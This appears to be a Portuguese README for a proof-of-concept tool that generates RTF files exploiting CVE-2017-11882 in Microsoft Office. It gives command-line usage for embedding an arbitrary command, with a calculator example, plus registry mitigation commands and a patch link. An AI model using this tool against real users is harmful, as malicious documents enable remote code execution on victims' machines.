
CVE-2017-11882 Gerador de Arquivos PoC
Existe uma vulnerabilidade de execução remota de código no software Microsoft Office quando o software falha ao manipular corretamente objetos na memória. Um invasor que explore com sucesso a vulnerabilidade pode executar código arbitrário no contexto do usuário atual.
Este é um PoC reeditado, a partir do original feito pela Embedi, para gerar um único arquivo .rtf com um comando remoto incorporado.
python 2017-11882_Generator.py -x comando_a_executar -o nome_do_arquivo_de_saída
Exemplo: python 2017-11882_Generator.py -x "cmd /c calc" -o test.rtf
Para pacote Microsoft Office 32-bit em sistema x86: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Para pacote Microsoft Office 32-bit em sistema x64: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
A Microsoft lançou um Patch https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882